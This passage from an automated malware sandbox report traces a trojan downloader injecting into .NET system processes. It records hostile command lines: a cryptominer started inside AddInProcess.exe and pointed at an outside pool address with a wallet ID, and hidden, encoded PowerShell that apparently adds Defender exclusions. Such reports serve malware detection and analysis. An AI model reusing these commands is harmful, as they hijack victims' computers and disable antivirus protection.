Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 2862341010
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4B6000
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4B8000
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E35008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe "C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Process created: C:\Users\user\AppData\Local\Temp\fdyryi.exe "C:\Users\user\AppData\Local\Temp\fdyryi.exe"
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Process created: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe "C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe"
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process created: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe "C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe"
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe "C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagiacgbvagsaxabbahaacabeageadabhafwatabvagmayqbsacwaqwa6afwavqbzaguacgbzafwaygbyag8aawbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiablaguaeqb3ag8acgbkahmalgblahgazqa7aa==
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagiacgbvagsaxabbahaacabeageadabhafwatabvagmayqbsacwaqwa6afwavqbzaguacgbzafwaygbyag8aawbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiablaguaeqb3ag8acgbkahmalgblahgazqa7aa==
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagiacgbvagsaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcae4ayqbtaguazabqaguacgbtagkacwbzagkabwbuafmazqb0ahmaxabbagwazwbvahiaaqb0aggabqbuahkacablac4azqb4agualabdadoaxabxagkabgbkag8adwbzafwatqbpagmacgbvahmabwbmahqalgboaeuavabcaeyacgbhag0azqb3ag8acgbradyanabcahyanaauadaalgazadaamwaxadkaxabbagqazabjag4auabyag8aywblahmacwauaguaeablacwaqwa6afwavqbzaguacgbzafwaygbyag8aawbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaiaataeyabwbyagmazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafcaaqbuagqabwb3ahmaxabnagkaywbyag8acwbvagyadaauae4arqbuafwargbyageabqblahcabwbyagsanga0afwadga0ac4amaauadmamaazadeaoqbcaeeazabkaekabgbqahiabwbjaguacwbzac4azqb4agualabdadoaxabvahmazqbyahmaxabiahiabwbrafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxaboageabqblagqauablahiabqbpahmacwbpag8abgbtaguadabzafwaqqbsagcabwbyagkadaboag0avab5ahaazqauaguaeablaa==
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Queries volume information: C:\Users\user\AppData\Local\Temp\fdyryi.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\fdyryi.exe Queries volume information: C:\Users\user\AppData\Local\Temp\fdyryi.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Queries volume information: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Queries volume information: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe Queries volume information: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
